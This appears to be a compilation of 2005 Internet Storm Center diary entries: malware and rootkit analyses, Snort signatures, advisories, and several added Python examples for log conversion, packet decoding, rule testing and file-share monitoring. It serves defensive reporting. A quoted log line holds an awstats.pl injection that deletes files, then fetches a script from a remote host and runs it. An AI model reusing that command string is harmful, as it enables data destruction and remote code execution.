Sure enough, rebooting the system using a Linux bootable CD, I can see the files sitting in the system32 directory... If I boot normally under Windows, they're "not there."
Cool.
Very, very cool.
(Note: Please don't take that the wrong way. When it comes to the folks who write things like this... their morals go so far beyond "twisted" that perhaps they're "sprained." In spite of that, you have to admit... this is pretty darned cool stuff...)
For Your Eyes Only
In any case, this little bugger has more than a few tricks up its sleeve:
It installs itself as two "LegacyDrivers" called "AVPX TCP" (avpx32.sys) and "AVPX64 TCP" (avpx64.sys). From this vantage point, it controls what data system calls (such as those used to enumerate files within the file system and enumerate keys within the registry) will and will not be allowed to return. It hides both the files that it creates and the registry keys that are used to launch and control them. It isn't "directory specific" when it masks files: for instance, if you use notepad to create a file on the desktop called avpx32.dll, the file disappears. Even though the file doesn't show up in a directory listing, trying to create another file with the same name results in a "file exists, replace?" prompt.
It does this by having avpx32.dll injected into essentially every running process.
It turns off memory write protection via the registry, allowing it free rein to overwrite portions of memory, and it installs registry values under the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot key to force itself to run even in Safe Mode.
Yes... you read that correctly: even in Safe Mode.
It sets up a listening process on TCP ports 7080, 8008, and 16661. It does not appear to hide these open ports, or at least it didn't do a very good job of hiding them. With the correct "logon sequence," connections to these backdoor ports will allow a remote "user" to:
Download and execute files
Steal passwords stored in Protected Storage
Steal any cached passwords
Steal dialup connection information
Log keystrokes
If that wasn't Evil enough, it steals information from Internet Explorer whenever the URL contains one of the strings: ebay.com, paypal.c and e-gold.c
It also takes the now passé step of blocking access to antivirus vendor websites.
And finally, as if to prove that Evil has no bounds, if you happen to actually *have* an e-gold account (remember, this all started off as an e-gold related spam...) it tries to steal even *more* information about you by logging onto e-gold using the information that it found on your machine.
Somewhere out there, there's a seriously Type-A malware author that should be switching to decaf...
-Tom Liston - Intelguardians Network Intelligence, LLC
0 Comments
s_ta_ts.js, anyone?
If you're curious, you can get your copy off hxxp://othersearch_dot_info/s_ta_ts.js or hxxp://bizfree_dot_org/s_ta_ts.js, but don't complain if you get burnt playing with fire. For the sensibly less curious, the decoded version is shown below, as an image so as not to scare your antivirus, which may or may not have coverage for this sort of thing.
The file doesn't do much (yet), it invokes Shockwave Flash in an attempt to get a pop-up past the pop-up blocker that most browsers nowadays have. But that's only one half of the story.
The origin of these goodies seems to be pages that have been successfully spammed into various search engines over the past month or so. Users searching, as an example, for completely benign things like "writing business letters" can get a search result that ranks two or three of these fake/spammed pages on top. Clicking on any of the search results then leads the user to the never-never land of pop-ups, and, yes, his/her personal copy of s_ta_ts.js.
In the meantime, we've identified thousands of web pages that only exist with the dual purpose of improving each other's search engine rating (by heavy cross linking) and of course to trick unsuspecting users into clicking themselves to never-never land.
Following up on the DNS domains involved in all these scams, it turns out that all the (physical world) addresses used for registering are completely and obviously bogus and made up. It seems that as long as the credit card used to pay for the domain doesn't bounce, it isn't overly important to most registrars whether the address is anywhere near legit.
0 Comments
Firefox v1.0.7 Released
From the release notes available at Mozilla Firefox website:
"This version includes several security and stability fixes, including a fix for a reported buffer overflow vulnerability and a fix for a Linux shell command vulnerability.
Specific changes in Firefox 1.0.7
- Fix for a potential buffer overflow vulnerability when loading a hostname with all soft-hyphens
- Fix to prevent URLs passed from external programs from being parsed by the shell (Linux only)
- Fix to prevent a crash when loading a Proxy Auto-Config (PAC) script that uses an "eval" statement
- Fix to restore InstallTrigger.getVersion() for Extension authors
- Other stability and security fixes"
0 Comments
Symantec VERITAS Storage Exec DCOM Server BO's
| Affected Product | Version | 
|---|---|
| Build Storage Exec | 5.3 Rev. 2190 | 
| Storage Central | 5.2 Rev. 322 | 
Older versions may be affected as well.
0 Comments
xmlrpc.php - Are you patched?
0 Comments
Important Clam AV Update
0 Comments
New Bagle Making the Rounds?
0 Comments
Updated Twiki Snort Sig
This is an update to a snort sig that we posted earlier for the recently announced TWiki vulnerability that allows for remote code execution:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:\
"BLEEDING-EDGE WEB twiki rev access"; flow:to_server,established; \
uricontent:"/TWikiUsers?"; nocase; pcre:"/rev=\d*[^\d\&\n]/Ui"; \
classtype:web-application-activity; reference:url,secunia.com/\
advisories/16820/; sid:2002366; rev:3;)
Note: This is a single line that has been broken to allow for better formatting in the diary. The "\" characters at the end of the lines above show where the line breaks have been added. Many thanks to Joe Esler, Chas Tomlin, Jason Brvenik, and Frank Knobbe and all the folks from Bleeding Edge (you guys rock!).
0 Comments
How to contribute your data to DShield / ISC
First of all: No submitter is too small. In particular cable modem / DSL user data is frequently the most interesting. We can always use more home users submitting data.
If you are able to submit from a large network, try to pick a few IP addresses and only send data from these IP addresses (e.g. a /24). A simple 'grep' may be all that's needed to filter the data, and our prewritten clients can help you with that.
We are interested in rejected packets from the outermost firewall you have access to. All rejected packets that originate from outside of your network are of interest.
We do accept logs via e-mail. It is recommended that you submit your logs about once an hour, but not less than once a day. We provide a number of scripts to automate the process.
The best reference to get you started is http://www.dshield.org/howto.php. As a quick summary:
- Windows Users
- Unix Users
- Others
You may also write your own script. Our format is a very simple tab delimited text file. For details, see http://www.dshield.org/specs.php.
We do provide a number of customized analysis features for submitters, which are accessible via DShield.org. For a Demo, see our demo-account.
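As an added example of the filtering step described above (this is not one of DShield's own clients; those are on the howto page), here is a small Python converter that reads netfilter/iptables syslog lines, keeps only drops whose destination lies in the /24 you chose to report and whose source is outside your own networks, and emits one tab-delimited record per packet. The sample log lines, the "FW-DROP" log prefix and the author id "12345" are constructed for the example. The column order of the output (date, author, count, source IP, source port, target IP, target port, protocol, flags) is written from memory of specs.php and is an assumption; check it against the spec before submitting. Syslog lines carry no year, so the caller supplies one.

```python
import ipaddress
import re
from datetime import datetime

# Constructed sample lines in the netfilter/iptables syslog format. "FW-DROP"
# and "FW-ACCEPT" stand in for whatever --log-prefix the firewall uses; the
# diary does not name one.
SAMPLE_LOG = """\
Sep 20 04:06:01 fw kernel: FW-DROP IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=5715 DF PROTO=TCP SPT=3307 DPT=445 WINDOW=16384 RES=0x00 SYN URGP=0
Sep 20 04:06:02 fw kernel: FW-DROP IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.11 LEN=404 TOS=0x00 PREC=0x00 TTL=113 ID=5716 PROTO=UDP SPT=1026 DPT=1434 LEN=384
Sep 20 04:06:03 fw kernel: FW-DROP IN=eth1 OUT= SRC=192.0.2.50 DST=192.0.2.10 LEN=48 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=TCP SPT=40000 DPT=22 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 20 04:06:04 fw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.9 DST=10.1.1.1 LEN=48 TOS=0x00 PREC=0x00 TTL=50 ID=2 DF PROTO=TCP SPT=4444 DPT=80 WINDOW=65535 RES=0x00 SYN ACK URGP=0
Sep 20 04:06:05 fw kernel: FW-ACCEPT IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 LEN=48 TOS=0x00 PREC=0x00 TTL=50 ID=3 DF PROTO=TCP SPT=4445 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0
"""

LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) \S+ kernel: "
    r"(?:\[[^\]]*\] )?(?P<prefix>\S+) .*?SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) "
    r".*?PROTO=(?P<proto>\w+)(?: SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+))?(?P<rest>.*)$")
# Flag words appear after RES=; \b keeps "URG" from matching inside "URGP=0".
FLAG_RE = re.compile(r"\b(SYN|ACK|FIN|RST|PSH|URG)\b")
FLAG_LETTER = {"SYN": "S", "ACK": "A", "FIN": "F", "RST": "R", "PSH": "P", "URG": "U"}


def parse_line(line, year):
    """Parse one iptables log line into a dict, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    flags = "".join(FLAG_LETTER[f] for f in FLAG_RE.findall(m["rest"]))
    return {"when": when, "prefix": m["prefix"], "src": m["src"], "dst": m["dst"],
            "proto": m["proto"], "spt": m["spt"] or "", "dpt": m["dpt"] or "", "flags": flags}


def to_dshield(rec, author, tz_offset="+00:00"):
    """One tab-delimited record. Column order is an assumption (see lead-in)."""
    return "\t".join([rec["when"].strftime("%Y-%m-%d %H:%M:%S ") + tz_offset, author, "1",
                      rec["src"], rec["spt"], rec["dst"], rec["dpt"], rec["proto"], rec["flags"]])


def filter_and_convert(lines, year, author, drop_prefix, submit_net, local_nets):
    """Keep rejected packets to submit_net that originate outside local_nets."""
    submit = ipaddress.ip_network(submit_net)
    inside = [ipaddress.ip_network(n) for n in local_nets]
    out = []
    for line in lines:
        rec = parse_line(line, year)
        if rec is None or rec["prefix"] != drop_prefix:
            continue
        src, dst = ipaddress.ip_address(rec["src"]), ipaddress.ip_address(rec["dst"])
        if dst not in submit:                 # only the block we chose to report
            continue
        if any(src in n for n in inside):     # only traffic from outside our network
            continue
        out.append(to_dshield(rec, author))
    return out


if __name__ == "__main__":
    for record in filter_and_convert(SAMPLE_LOG.splitlines(), 2005, "12345", "FW-DROP",
                                     "192.0.2.0/24", ["192.0.2.0/24", "10.0.0.0/8"]):
        print(record)
```

Of the five constructed lines only the first two survive: the third comes from inside the local range, the fourth is addressed outside the reported /24, and the fifth was accepted rather than dropped.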
0 Comments
Notes from the DShield Forum
Andy Green reported that his server received a scan for the vulnerable awstats.pl script, even though the script was not actually present on his server:
[04:06:01 +0100] GET //awstats.pl?configdir=
|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20members.lycos.co.uk/mariusbou/a.txt;
perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1 404 287 -
In an unrelated post, Jakob Staerk reported receiving crafted ICMP "time exceeded in transit" packets hitting his server:
16:18:29.282413 IP (tos 0x0, ttl 243, id 5715, offset 0,
flags [none], length: 56)
219.158.8.221 > xx.xx.xx.xx:
icmp 36: time exceeded in-transit for IP
(tos 0x0, ttl 1, id 6520, offset 0, flags [DF], length: 48)
xx.xx.xx.xx.11582 > 222.168.227.212.80: [|tcp]
0x0000: 4500 0038 1653 0000 f301 474b db9e 08dd E..8.S....GK....
0x0010: xxxx xxxx 0b00 b1c1 0000 0000 4500 0030 xxxx........E..0
0x0020: 1978 4000 0106 1828 xxxx xxxx dea8 e3d4 .x@....(xxxx....
0x0030: 2d3e 0050 6a78 ab37 ->.Pjx.7
For additional information about these issues, please see the corresponding DShield posts. (Note that the long lines above were wrapped for readability.)
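To see what such a "time exceeded" message actually claims, it helps to decode the quoted inner header by hand. The following is an added example (not from the DShield post or from Jakob): a Python decoder that rebuilds the packet from the tcpdump hex lines above, walks outer IP, ICMP and the quoted inner IP header, and pulls the ports and sequence number from the 8 bytes of TCP that RFC 792 guarantees will be quoted. The poster masked his own address with "xxxx"; in the constructed SAMPLE_DUMP those two words are filled with 0a00 0002 (10.0.0.2) so the bytes parse; every other byte is exactly as printed. The tuple returned by quoted_flow is the connection the message says expired, which is what you would look up in your own firewall or connection logs to decide whether the message is legitimate.

```python
import re
import struct

# The ICMP "time exceeded" packet from the post, as tcpdump printed it. The two
# masked "xxxx xxxx" words are replaced with 0a00 0002 (10.0.0.2) for this
# constructed sample; all other bytes are unchanged.
SAMPLE_DUMP = """\
0x0000: 4500 0038 1653 0000 f301 474b db9e 08dd E..8.S....GK....
0x0010: 0a00 0002 0b00 b1c1 0000 0000 4500 0030 ............E..0
0x0020: 1978 4000 0106 1828 0a00 0002 dea8 e3d4 .x@....(........
0x0030: 2d3e 0050 6a78 ab37 ->.Pjx.7
"""

HEX_WORD = re.compile(r"^[0-9a-fA-F]{2,4}$")


def hexdump_to_bytes(dump):
    """Rebuild raw bytes from 'tcpdump -x' style lines: an offset, up to eight
    hex words, then an ASCII column that is ignored."""
    out = bytearray()
    for line in dump.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("0x"):
            continue
        for word in parts[1:9]:
            if not HEX_WORD.match(word):
                break                      # reached the ASCII column
            out += bytes.fromhex(word)
    return bytes(out)


def ip_str(b):
    return ".".join(str(x) for x in b)


def parse_ipv4(buf, off=0):
    """Decode the fixed part of an IPv4 header at buf[off]; returns (fields, next_offset)."""
    vihl, _tos, total, ident, frag, ttl, proto, _csum = struct.unpack_from("!BBHHHBBH", buf, off)
    ihl = (vihl & 0x0F) * 4
    if ihl < 20 or len(buf) < off + ihl:
        raise ValueError("truncated or malformed IPv4 header")
    fields = {"len": total, "id": ident, "df": bool(frag & 0x4000), "ttl": ttl,
              "proto": proto, "src": ip_str(buf[off + 12:off + 16]),
              "dst": ip_str(buf[off + 16:off + 20])}
    return fields, off + ihl


def parse_time_exceeded(buf):
    """Walk outer IP -> ICMP -> quoted inner IP -> first 8 bytes of quoted TCP."""
    outer, off = parse_ipv4(buf)
    if outer["proto"] != 1:
        raise ValueError("outer packet is not ICMP")
    itype, icode = struct.unpack_from("!BB", buf, off)
    off += 8                                   # type, code, checksum, unused word
    inner, ioff = parse_ipv4(buf, off)
    result = {"outer": outer, "icmp_type": itype, "icmp_code": icode, "inner": inner}
    # RFC 792 only guarantees the inner header plus 8 bytes of its payload,
    # which for TCP is just enough for both ports and the sequence number.
    if inner["proto"] == 6 and len(buf) >= ioff + 8:
        sport, dport, seq = struct.unpack_from("!HHI", buf, ioff)
        result["inner_tcp"] = {"sport": sport, "dport": dport, "seq": seq}
    return result


def quoted_flow(parsed):
    """The connection the ICMP message claims to be about, as (src, sport, dst, dport)."""
    tcp = parsed.get("inner_tcp")
    if tcp is None:
        return None
    return (parsed["inner"]["src"], tcp["sport"], parsed["inner"]["dst"], tcp["dport"])


if __name__ == "__main__":
    parsed = parse_time_exceeded(hexdump_to_bytes(SAMPLE_DUMP))
    print(parsed)
    print("quoted flow:", quoted_flow(parsed))
```

The decoded values match tcpdump's summary line for line: outer id 5715 and ttl 243 from 219.158.8.221, ICMP type 11 code 0, and a quoted packet with id 6520, DF set, ttl 1, bound for 222.168.227.212 port 80 from source port 11582.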
0 Comments
A TWiki Vulnerability Allows Remote Code Execution
To learn more about this problem, and to download a patch, go to:
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
TWiki is a popular web-based collaboration tool. If you have it installed, we urge you to patch it as soon as possible. We are expecting to see a worm that exploits the recent vulnerability pretty soon.
Chas Tomlin provided us with the following Snort signature, which he put together with help from others:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB twiki rev access"; flow:to_server,established; uricontent:"/bin/view/Main/TWikiUsers?"; nocase; pcre:"/rev=\d+%20/i"; classtype:web-application-activity; reference:url,secunia.com/advisories/16820/; sid:2002366; rev:2;)
This rule is also available from the Bleeding Snort website.
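The rev:2 rule here and the rev:3 update to it (in the "Updated Twiki Snort Sig" entry above) differ in two places: the uricontent anchor and the pcre. To make the difference concrete, the following added example (not from Bleeding Edge or the diary) applies both rule revisions to a handful of constructed request URIs. Snort's "U" pcre modifier restricts the match to the normalised URI buffer; Python has no equivalent, so the patterns are simply applied to the request URI string, and uricontent is modelled as a case-insensitive substring test.

```python
import re

# The pcre options from the two rule revisions, minus Snort's "U" modifier
# (match on the URI buffer), which we emulate by matching the URI directly.
REV2_PCRE = re.compile(r"rev=\d+%20", re.I)
REV3_PCRE = re.compile(r"rev=\d*[^\d\&\n]", re.I)

# uricontent (nocase) and pcre for each revision, as given in the two diary entries.
RULES = {
    2: ("/bin/view/Main/TWikiUsers?", REV2_PCRE),
    3: ("/TWikiUsers?", REV3_PCRE),
}

# Constructed request URIs: two ordinary revision views that must not alert,
# and several with something other than a plain number after rev=.
SAMPLE_URIS = [
    "/twiki/bin/view/Main/TWikiUsers?rev=12",
    "/twiki/bin/view/Main/TWikiUsers?rev=12&skin=plain",
    "/twiki/bin/view/Main/TWikiUsers?rev=1%20foo",
    "/twiki/bin/view/Main/TWikiUsers?rev=%20foo",
    "/twiki/bin/view/Main/TWikiUsers?rev=1;foo",
    "/twiki/bin/view/Main/TWikiUsers?REV=1%20foo",
    "/twiki/bin/view/Sandbox/TWikiUsers?rev=1;foo",
]


def rule_fires(rev, uri):
    """True if both the uricontent and the pcre of the given rule revision match."""
    content, pcre = RULES[rev]
    return content.lower() in uri.lower() and pcre.search(uri) is not None


def compare(uris):
    """{uri: (rev2_fires, rev3_fires)} for a quick side-by-side of the two revisions."""
    return {u: (rule_fires(2, u), rule_fires(3, u)) for u in uris}


if __name__ == "__main__":
    for uri, (r2, r3) in compare(SAMPLE_URIS).items():
        print(f"rev2={r2!s:5} rev3={r3!s:5} {uri}")
```

Both revisions leave a plain numeric rev alone, including one followed by another parameter. The rev:3 pcre additionally fires when the revision is empty or is followed by any character other than a digit or an ampersand, not just an encoded space, and its shorter uricontent also covers TWikiUsers pages in webs other than Main.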
0 Comments
Are you being harassed or stalked online?
We received an email today from someone who is concerned that they are being harassed by someone online. The individual was asking the Handler's group for help in finding someone to help her track down an online attacker.
I wanted to address this issue here. I have investigated a similar claim in the past. Without getting into much detail about the particular incident (to protect the identity of both the innocent and the guilty) I want to discuss my response to those who are concerned about Cyber Harassment and Stalking.
Is it possible that someone could accomplish this? Absolutely. Is it likely? Not under normal circumstances.
A lot of things could be happening behind the scenes.
* You may have spyware or viruses on your computer that are allowing certain confidential information to leak out.
* You may have given someone more information than you should have in a chat room or email.
* You may have a computer that lacks sufficient protection (firewall, anti-virus program, operating system updates, etc).
In the case that I investigated, the "victim" claimed that they knew who the people were that were responsible. There was no evidence that anyone had done anything to the computer. Nothing more than the installation of the normal, run of the mill spyware and adware was found.
It is highly unlikely that this type of activity is taking place. What is more than likely taking place is what we see evidence of every day at the Storm Center and elsewhere on the Internet. Take a look at the Internet Storm Center and you will see the Survival Time referenced, along with a link to the Survival Time History. The Survival Time right now, today, is 23 minutes. That means that an unprotected computer with no firewall, anti-virus or spyware/adware protection will likely become infected in just 23 minutes. That is all the longer it takes to compromise a brand spanking new computer, right out of the box. Now take a look at the History link. You see that we had less than 10 minutes in May 2004 and less than 5 minutes in August 2004 (Blaster).
Take a look at the Top 10 Ports and you will see that there is continuous port activity. That is the nature of the Internet: with 65,565 ports available you are bound to see some of them alive doing things like pop mail (110), web (80), DNS (53), etc.
So what can you do to protect yourself and your computer?
Here is a link to the Survival Guide. This document will help you put the things in place to minimize the potential for someone to break into your computer.
http://isc.sans.org/presentations/xpsurvivalguide.pdf
What do you do if you think you are being harassed?
Don't jump to conclusions.
Contact your local Police Department or your local FBI office. They can investigate your issues and if they suspect that you do have a problem they can conduct a full investigation.
Don't give out personally identifiable information either online or by telephone if you did not initiate the contact. Use caution when sharing information with others, even if you did initiate the contact. Give only the information that is essential to complete the transaction or enquiry.
Only you can protect yourself and your identity.
0 Comments
Where does all the data come from?
Take a look at the Flash Movie that our own Dr J. put together. This shows where the data that has been received at the DShield Database server in the last 5 minutes originated from.
http://isc.sans.org/packetattack.php
(I particularly like the representation of the data received from the US - it appears that Johannes too understands that Iowa is indeed the Center of the US.)
0 Comments
Free time?
For example, last year I looked for a solution to monitor the changes to a Windows file share. I needed a report at the end of the day showing new files, deleted files, etc. This would allow me to detect security policy violations in an automated fashion. I couldn't find anything free or commercial to do it, so I rolled my own in Python and SQLite (a light-weight database engine). Interestingly, I discussed my project with several Windows system admins and none had ever thought about monitoring a file server in this manner.
Be sure to include whether you would allow us to reprint the code or description of the code on the site.
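For readers who want to try the same idea, here is an added example of such a monitor in Python and SQLite (it is not the handler's own tool, which is not on this page): each run walks the share, stores path, size, mtime and SHA-256 per file under a run id, and the report diffs the newest run against the previous one. Modification is decided by content hash rather than mtime, so a file rewritten within the same second, or with its timestamp reset, is still reported. The demo() function builds a throwaway directory, takes a baseline, makes one change of each kind and returns the report; the share path, database path and file names in it are constructed for the example.

```python
import hashlib
import os
import shutil
import sqlite3
import tempfile
import time


def file_digest(path, chunk=65536):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Walk root and return {relative_path: (size, mtime, sha256)}.
    Paths use '/' so the database is comparable across platforms."""
    result = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                st = os.stat(full)
                digest = file_digest(full)
            except OSError:
                continue      # removed or locked between listing and read
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = (st.st_size, int(st.st_mtime), digest)
    return result


def open_db(db_path):
    conn = sqlite3.connect(db_path)
    conn.executescript("""
        CREATE TABLE IF NOT EXISTS runs (id INTEGER PRIMARY KEY, taken_at REAL);
        CREATE TABLE IF NOT EXISTS files (
            run_id INTEGER, path TEXT, size INTEGER, mtime INTEGER, digest TEXT,
            PRIMARY KEY (run_id, path));
    """)
    return conn


def record_run(conn, snap):
    run_id = conn.execute("INSERT INTO runs (taken_at) VALUES (?)", (time.time(),)).lastrowid
    conn.executemany("INSERT INTO files VALUES (?, ?, ?, ?, ?)",
                     [(run_id, p, s, m, d) for p, (s, m, d) in snap.items()])
    conn.commit()
    return run_id


def load_run(conn, run_id):
    rows = conn.execute("SELECT path, size, mtime, digest FROM files WHERE run_id = ?", (run_id,))
    return {p: (s, m, d) for p, s, m, d in rows}


def diff_runs(conn, old_id, new_id):
    """Compare two recorded runs; 'modified' means the content hash changed."""
    old, new = load_run(conn, old_id), load_run(conn, new_id)
    added = sorted(set(new) - set(old))
    deleted = sorted(set(old) - set(new))
    modified = sorted(p for p in set(old) & set(new) if old[p][2] != new[p][2])
    return added, deleted, modified


def run_and_report(root, db_path):
    """Snapshot root, store it, and return (added, deleted, modified) against
    the previous run, or None on the very first run."""
    conn = open_db(db_path)
    try:
        new_id = record_run(conn, snapshot(root))
        prev = conn.execute("SELECT MAX(id) FROM runs WHERE id < ?", (new_id,)).fetchone()[0]
        return None if prev is None else diff_runs(conn, prev, new_id)
    finally:
        conn.close()


def _write(share, rel, data):
    with open(os.path.join(share, rel), "w") as fh:
        fh.write(data)


def demo():
    """Baseline run on a constructed tree, then one change of each kind, then
    the report. Returns (first_result, second_result)."""
    work = tempfile.mkdtemp()
    try:
        share, db = os.path.join(work, "share"), os.path.join(work, "monitor.sqlite")
        os.makedirs(os.path.join(share, "finance"))
        _write(share, "readme.txt", "hello")
        _write(share, "finance/q3.xls", "numbers")
        first = run_and_report(share, db)
        _write(share, "finance/q3.xls", "numbers, revised")   # modified
        _write(share, "new.docx", "draft")                     # added
        os.remove(os.path.join(share, "readme.txt"))           # deleted
        second = run_and_report(share, db)
        return first, second
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

Run it once an hour or once a day from a scheduled task against the mounted share, and the end-of-day report is simply the diff of the last two run ids. Keeping every run in the database (rather than overwriting one baseline) also lets you answer "when did this file first appear?" later.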
0 Comments
Multiple Linksys WRT54G Vulnerabilities
The iDefense advisories are here:
iDefense advisory 304
iDefense advisory 305
iDefense advisory 306
iDefense advisory 307
iDefense advisory 308
0 Comments
Microsoft Windows Update Errors
Two of our handlers noticed some weirdness with Microsoft Update. See the image.
Update (handler Kyle Haugsness): Several people have responded with proposed fixes. Unfortunately, they are all different. The suggestions are diverse: disable all anti-virus (especially Norton and McAfee), re-install Internet Explorer, delete the Internet Explorer cache, re-install XP Service Pack 2, flush the DNS cache, and log in as local administrator.
So the moral of this story is: several people seem to be having the problem occasionally and if this is affecting you, good luck in figuring out the right approach. This one seems to have no consistent cause or solution.
0 Comments
MacOS X Java patches
The downloads are available at Apple Support Download.
Scott Fendley, Handler on Duty
0 Comments
Security Mailing Lists for Academia
There are two major mailing lists that are the primary resources for security discussions in this microcosm: Unisog and Educause Security.
First is the Unisog mailing list. Unisog stands for UNIversity Security Operations Group, and this group was created out of excellent discussions occurring after hours or in the hallways at a SANS conference (correct me Unisogers if it was another conference). It has been around for a number of years, has some very knowledgeable people involved, and is usually more technical in nature. For more information on this mailing list, please see the Unisog mailing list information located at lists.sans.org.
Second is the Educause Security Discussion Group. Educause was formed in the late 1990s by two professional associations with a mission to advance academia by promoting the intelligent use of IT. A few years back, Educause formed an IT security discussion group to promote awareness, security solutions, effective practices and general discussion for those in higher education. In general, I see policy and administrative level discussion on this list. This is a great resource to see what your peer institutions are doing, and not have to re-invent the wheel on the more upper level details. For more information on this mailing list, please see the Educause Security Discussion Group information.
In general, both of these mailing lists are excellent resources. There is no reason that those of us who work in the university community have to "re-invent the wheel" on any of our projects, whether they are technical or administrative in nature.
----
Scott Fendley
Handler on Duty
University of Arkansas
0 Comments
Microsoft Releases Updates
Microsoft did release a couple of updates today nonetheless.
First, the monthly "Malicious Software Removal Tool" was updated to handle new variations of some new and old pieces of malware. For more technical details, please go to Microsoft KB Article 890830 for information and a link to the manual download location.
Second, Microsoft released an update for Windows 2000 SP4 Update Rollup 1. That would make this, "Microsoft Windows 2000 Service Pack 4, Update Rollup 1 version 2." Now that is a mouthful! For those that don't remember, Update Rollup 1 was originally released in June 2005. This version appears to fix some known problems with the original version that were discovered after the update went out for testing. For more information please see Microsoft KB Article 891861.
I have not found any other updated patches or anything else noteworthy on the Microsoft front today. If I missed something else, please let me or the other handlers know.
----
Scott Fendley, Handler on Duty
0 Comments
Snort Denial of Service Vulnerability
Earlier Monday, Snort.org announced a vulnerability in the 2.x series of the open source IDS software. The vulnerability was found in the PrintTcpOptions() function and could allow an attacker to use a malformed, crafted TCP/IP packet to cause a DoS in Snort. These vulnerabilities involve NULL pointer dereferences, which should mean that only a Denial of Service is possible.
JustinF noted earlier today that the original advisory that I grabbed from the snort.org site was not completely accurate. You _do not_ have to be running snort with the -v flag set, as there are other execution paths that lead to the PrintTcpOptions() function. Notably, PrintIPPacket() can be used to call the vulnerable function. This requires the packet to meet a few requirements, such as not being a fragment[1] and having TCP as its protocol. (For those looking at the code from cvs, this takes a couple of levels of following the code to see this connection.)
Justin noted that using "-A fast", logging in ASCII mode, and the frag3 and stream4 preprocessors can all potentially lead to PrintTcpOptions(), in addition to the initially reported -v flag.
He also noted that there are several bugs in PrintTcpOptions(), which is apparent from the changes made to the source, which cover nearly all of the TCP options, not just SACK.
Thanks Justin for looking closely at the code and bringing it to our attention.
Fix and Workaround Details:
A fix for this vulnerability was checked into the Snort 2.4 CVS tree on August 23rd, 2005 and is available for download here. This fix will also be included in the upcoming 2.4.1 release.
Proof of Concept Released:
In addition, proof of concept code has been released concerning this vulnerability.
References:
Snort News
VulnFact Advisory
FRSIRT Bulletin
------------
Scott Fendley, Handler on Duty
0 Comments
WebCalendar Exploitation
We have had reports submitted that web servers running WebCalendar 0.9.x or WebCalendar 1.x are being exploited. Some defacers/crackers have started using the WebCalendar PHP remote file inclusion vulnerability, using it to deface web sites, upload Trojans and more. I saw one defacer group use this method and then upload a Trojan which steals bank IDs/passwords from the user's system.
Official WebCalendar releases can be obtained from the SourceForge development server. The latest version is 1.0.1; please update to the latest version.
Secunia Vulnerability description - WebCalendar "includedir" Arbitrary File Inclusion Vulnerability
SecurityFocus Vulnerability description - WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
Kevin Hong
Handler On Duty
0 Comments
Larger Power Outage in Los Angeles
LA Times Story
0 Comments
New Bagle variant
Subject : No Subject
Contents : new price or price
Attached file : new_price.zip (12490) or price.zip (12498)
new_price.zip : c3954e35d8b9b3a63d42c5718ed1624d
price.zip : c16ddcef3b01f1ec46750f7a1991ee91
Inside of zip file : 1.cpl (14340) or price.cpl (14340)
1.cpl (4fb426de872ee9b20c3312fae3adf018)
price.cpl (951053055f16d331a42475c209803430)
Kevin Hong - khong at kisa.or.kr
Handler on Duty
0 Comments
Firefox 1.5 beta 1 released
Firefox version 1.5 beta out
You can get from here : FireFox 1.5 Beta 1
One of our readers, Matthew, submitted that there is a new version of Firefox available for download. The latest version of the Firefox web browser, 1.5, is out in beta 1. After personally installing it earlier today I have found it to be incredibly stable and feature rich. According to Mozilla, Firefox 1.5 beta 1 is still vulnerable to the IDN buffer overflow vulnerability published on Sep. 8th. It is highly recommended that all users take the steps indicated in the link below to secure against this vulnerability.
Patch information
https://addons.mozilla.org/messages/307259.html
Tony Carothers
Handler on Duty
0 Comments
imap4d Vulnerability & Patch Released
Patch Link
http://savannah.gnu.org/patch/index.php?func=detailitem&item_id=4407
Vulnerability Link
http://www.idefense.com/application/poi/display?id=303
GNU Mailutils information
http://www.gnu.org/software/mailutils/mailutils.html
Tony Carothers
Handler on Duty
0 Comments
Firefox Vulnerability
0 Comments
Netscape URL Domain Name Buffer Overflow
0 Comments
Family News Network of the ICRC - Hurricane Katrina
However, note that the ICRC has no means of verifying the information sent through the network and thus cannot accept responsibility for any inaccurate information made available on the website.
You can find more details at http://www.familylinks.icrc.org/katrina.
Thanks to Melvin.
0 Comments
AT&T Network Outage
0 Comments
MS Black Tuesday?
Next week, we will have just one Microsoft Security Bulletin released in the monthly security bulletins. But it is rated as critical, which deserves attention.
Our good reader Juha-Matti sent this to us:
According to the Security Bulletin Advance Notification Program page, Microsoft will release one monthly security bulletin and it is affecting Windows. The highest maximum severity rating for this update is critical. The company says that these updates may require a restart to take effect.
Additionally, as usual, they will release an updated version of the Malicious Software Removal Tool on Windows/Microsoft Update, Windows Server Update Services and the Download Center.
0 Comments
New Firefox Vulnerability
Something nice to start a friday morning...
